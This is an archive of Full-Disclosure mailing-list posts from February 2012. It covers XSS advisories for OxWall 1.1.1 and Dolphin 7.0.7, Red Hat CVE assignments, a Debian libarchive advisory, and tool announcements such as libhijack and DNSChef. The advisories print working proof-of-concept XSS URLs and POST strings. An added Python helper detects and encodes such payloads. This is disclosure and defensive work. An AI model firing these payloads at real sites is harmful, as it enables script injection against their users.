[Full-disclosure] Addition to CVE-2012-0872 oxwall

2012-02-21 Thread MG

Our addition to yesterday's YGN advisory:


# CVE-2012-0872

{ Ariko-Security - Advisory #2/2/2012 }

OxWall Cross-site scripting (XSS)


Vendor's description of software and download:
# Oxwall Foundation http://www.oxwall.org/

Dork:
# N/a

Application Info:
# OxWall 1.1.1


Vulnerability Info:
# Type: XSS 

Time Table:
# 13/02/2012 - Vendor notified


XSS:
# Input passed to the "plugin" parameter in index.php is not properly sanitised
before being returned to the user.

Solution:
# Input validation of vulnerable parameters should be corrected.

POC:

http://site/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E

advisory:
http://advisories.ariko-security.com/2012/audyt_bezpieczenstwa_2m2.html

Credit:
# Discovered By: Ariko-Security 2012

Ariko-Security
Rynek Glowny 12
32-600 Oswiecim
tel:. +48 33 4741511 mobile: +48 784086818
(Mo-Fr 10.00-20.00 CET)

Ariko-Security Sp. z o.o., with its registered office in Oświęcim, registered by
the District Court for Kraków-Śródmieście, 12th Commercial Division of the
National Court Register, KRS: 0358273, NIP: 549-239-90-67, REGON 121262172

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [oss-security] Dolphin 7.0.7 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread Kurt Seifried
On 02/20/2012 10:05 AM, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> Dolphin is the only "all-in-one" free community software platform for
> creating your own social networking, community or online dating site
> without any limits and under your full control. Dolphin comes with
> hundreds of features, module plugins and tools. Everything is included
> and extension possibilities are literally endless. You can use it for
> free with a BoonEx link in the footer or buy a $99 permanent license
> to remove that requirement.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters (explain, photos_only, online_only, mode) were not
> properly sanitized, which allows an attacker to conduct a Cross Site
> Scripting attack. This may allow an attacker to create a specially
> crafted URL that would execute arbitrary script code in a victim's
> browser.
> 
> 
> 4. VERSIONS AFFECTED
> 
> 7.0.7 and lower
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> Vulnerable Parameter: explain
> 
> http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
> 
> 
> Vulnerable Parameters: photos_only,online_only,mode
> 
> http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='">alert(/xss/)
> 
> http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='">alert(/xss/)
> 
> http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='">alert(/xss/)
> 
> 
> 6. SOLUTION
> 
> Upgrade to the latest version of Dolphin.
> 
> 
> 7. VENDOR
> 
> BoonEx Pty Ltd
> http://www.boonex.com/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-06-09: notified vendor
> 2011-10-24: fixed version, 7.0.8, released
> 2012-02-20: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss
> BoonEx Home Page: http://www.boonex.com/
> 
> 
> #yehg [2012-02-20]

Please use CVE-2012-0873 for these XSS issues.

-- 
Kurt Seifried Red Hat Security Response Team (SRT)


Re: [Full-disclosure] [oss-security] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread Kurt Seifried
On 02/20/2012 09:53 AM, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> Oxwall is a free open source software package for building social
> networks, family sites and collaboration systems. It is a flexible
> community website engine developed with the aim to provide people with
> a well-coded, user-friendly software platform for social needs. It is
> easy to set up, configure and manage Oxwall while you focus on your
> site idea. We are testing the concept of free open source community
> software for complete (site,sub-site setups) and partial
> (widgets,features) community and collaboration solutions for companies
> and individuals.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters were not properly sanitized, which allows an attacker
> to conduct a Cross Site Scripting attack. This may allow an attacker to
> create a specially crafted URL that would execute arbitrary script
> code in a victim's browser.
> 
> 
> 4. VERSIONS AFFECTED
> 
> 1.1.1 and lower
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> URL: http://localhost/Oxwall/join
> 
> Injected Attack String: '">alert(/XSS/)
> Method: HTTP POST
> Vulnerable Parameters: captchaField, email, form_name, password,
> realname, repeatPassword, username
> 
> 
> 
> URL: http://localhost/Oxwall/contact
> 
> Injected Attack String: '">alert(/XSS/)
> Method: HTTP POST
> Vulnerable Parameters: captcha, email, form_name, from, subject
> 
> 
> URL: 
> http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
> Vulnerable Parameter: tag
> 
> 
> 
> Vulnerable Parameter: RAW-URI
> 
> http://localhost/Oxwall/photo/viewlist/tagged/> onerror=alert('XSS')>
> 
> http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
> 
> http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=
> 
> 
> 6. SOLUTION
> 
> Upgrade to the latest version of Oxwall.
> 
> 
> 7. VENDOR
> 
> Oxwall Foundation
> http://www.oxwall.org/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-06-09: notified vendor
> 2012-02-20: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL:
> http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
> Oxwall Home Page: http://www.oxwall.org/
> 
> 
> #yehg [2012-02-20]

Please use CVE-2012-0872 for these XSS issues.

-- 
Kurt Seifried Red Hat Security Response Team (SRT)

[Full-disclosure] Dolphin 7.0.7 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

Dolphin 7.0.7 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Dolphin is the only "all-in-one" free community software platform for
creating your own social networking, community or online dating site
without any limits and under your full control. Dolphin comes with
hundreds of features, module plugins and tools. Everything is included
and extension possibilities are literally endless. You can use it for
free with a BoonEx link in the footer or buy a $99 permanent license
to remove that requirement.


3. VULNERABILITY DESCRIPTION

Multiple parameters (explain, photos_only, online_only, mode) were not
properly sanitized, which allows an attacker to conduct a Cross Site
Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's
browser.


4. VERSIONS AFFECTED

7.0.7 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

Vulnerable Parameter: explain

http://localhost/dolph/explanation.php?explain=%27%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E


Vulnerable Parameters: photos_only,online_only,mode

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&photos_only='">alert(/xss/)

http://localhost/dolph/viewFriends.php?iUser=1&page=1&per_page=32&sort=activity&online_only='">alert(/xss/)

http://localhost/dolph/viewFriends.php?iUser=1&page=1&sort=activity&mode='">alert(/xss/)


6. SOLUTION

Upgrade to the latest version of Dolphin.


7. VENDOR

BoonEx Pty Ltd
http://www.boonex.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2011-10-24: fixed version, 7.0.8, released
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BDolphin_7.0.7%5D_xss
BoonEx Home Page: http://www.boonex.com/


#yehg [2012-02-20]


[Full-disclosure] OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

1.1.1 and lower


5. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/Oxwall/join

Injected Attack String: '">alert(/XSS/)
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name, password,
realname, repeatPassword, username



URL: http://localhost/Oxwall/contact

Injected Attack String: '">alert(/XSS/)
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name, from, subject


URL: 
http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Vulnerable Parameter: tag



Vulnerable Parameter: RAW-URI

http://localhost/Oxwall/photo/viewlist/tagged/>

http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=

http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=


6. SOLUTION

Upgrade to the latest version of Oxwall.


7. VENDOR

Oxwall Foundation
http://www.oxwall.org/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2012-02-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss
Oxwall Home Page: http://www.oxwall.org/


#yehg [2012-02-20]
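
Added example, not part of either OxWall advisory or of the OxWall code base: a Python triage helper that decodes request targets and reports query parameters or path segments carrying HTML breakout characters, then applies the output encoding that makes the same values inert when reflected. The function names and the sample request targets are assumptions constructed for illustration; two of the targets reuse proof-of-concept strings quoted in the posts above.

```python
import html
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let reflected input leave an HTML attribute or text node.
HTML_BREAKOUT = set("<>\"'")

def find_breakouts(request_target):
    """Return (location, decoded value) pairs for each query parameter or
    path segment whose decoded form contains an HTML breakout character."""
    parts = urlsplit(request_target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if HTML_BREAKOUT & set(value):
            hits.append(("param:" + name, value))
    # The "RAW-URI" cases carry the markup in the path, not in a parameter.
    for segment in parts.path.split("/"):
        decoded = unquote(segment)
        if HTML_BREAKOUT & set(decoded):
            hits.append(("path", decoded))
    return hits

def encode_for_html(value):
    """Encode a value for reflection into element text or a quoted attribute."""
    return html.escape(value, quote=True)

# Constructed request targets: the first two reuse proof-of-concept strings
# quoted in the advisories, the third is an ordinary request.
SAMPLE_TARGETS = [
    "/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt"
    "%28982087%29%3C%2fScRiPt%3E",
    "/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;"
    "height:1000px;display:block;left:0;top:0%22onmouseover="
    "alert%28%27XSS%27%29;%22x=",
    "/Oxwall/blogs/browse-by-tag?tag=holiday",
]

if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        for location, value in find_breakouts(target):
            print(location, "->", encode_for_html(value))
```

The same check applies to decoded POST body fields such as those listed for /join and /contact; only the source of the name/value pairs changes.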


[Full-disclosure] [Tool] Libhijack 0.6 Released

2012-02-21 Thread Shawn Webb
I'm proud to announce the release of libhijack 0.6 today. Libhijack is
a shared object that makes runtime process infection on 32/64bit Linux
and 64bit FreeBSD easy. You can read the full release announcement
here: http://0xfeedface.org/blog/lattera/2012-02-20/libhijack-06-released

Thanks,

Shawn "lattera" Webb


[Full-disclosure] DNSChef - a highly configurable DNS proxy

2012-02-21 Thread iphelix
Hello fulldisclosure,

I wanted to share a new tool to help with application traffic analysis 
and interception. DNSChef is a cross-platform DNS proxy capable of 
forging responses based on inclusive and exclusive domain lists, 
matching domains with wildcards, proxying true responses for nonmatching 
domains, using external configuration files and other features useful 
for pentesters and malware analysts. DNSChef was developed to help with 
a test of an application which did not support HTTP proxy parameters. 
There are many ways to intercept network traffic; however, you may find 
this tool handy when everything else fails.

DNSChef source and documentation: 
http://thesprawl.org/projects/dnschef/

-Peter


[Full-disclosure] [SECURITY] [DSA 2413-1] libarchive security update

2012-02-21 Thread Luk Claes
Debian Security Advisory DSA-2413-1                   secur...@debian.org
http://www.debian.org/security/                                 Luk Claes
February 20, 2012                      http://www.debian.org/security/faq

Package: libarchive
Vulnerability  : buffer overflows
Problem type   : remote/local
Debian-specific: no
CVE ID : CVE-2011-1777 CVE-2011-1778

Two buffer overflows have been discovered in libarchive, a library
providing a flexible interface for reading and writing archives in
various formats. The possible buffer overflows while reading iso9660
or tar streams allow remote attackers to execute arbitrary
code depending on the application that makes use of this functionality.

For the stable distribution (squeeze), this problem has been fixed in
version 2.8.4-1+squeeze1.

For the testing (wheezy) and unstable (sid) distributions,
this problem has been fixed in version 2.8.5-5.

We recommend that you upgrade your libarchive packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

Re: [Full-disclosure] Fwd: [Webappsec] Call for Assistance: OWASP Virtual Patching Survey

2012-02-21 Thread Jacqui Caren
On 21/02/2012 02:04, Jeffrey Walton wrote:
> It is only 10 questions and by taking the survey, you could also win a
> free spot in the upcoming OWASP AppSecDC Virtual Patching Workshop.

At least they do not insist on an email address.
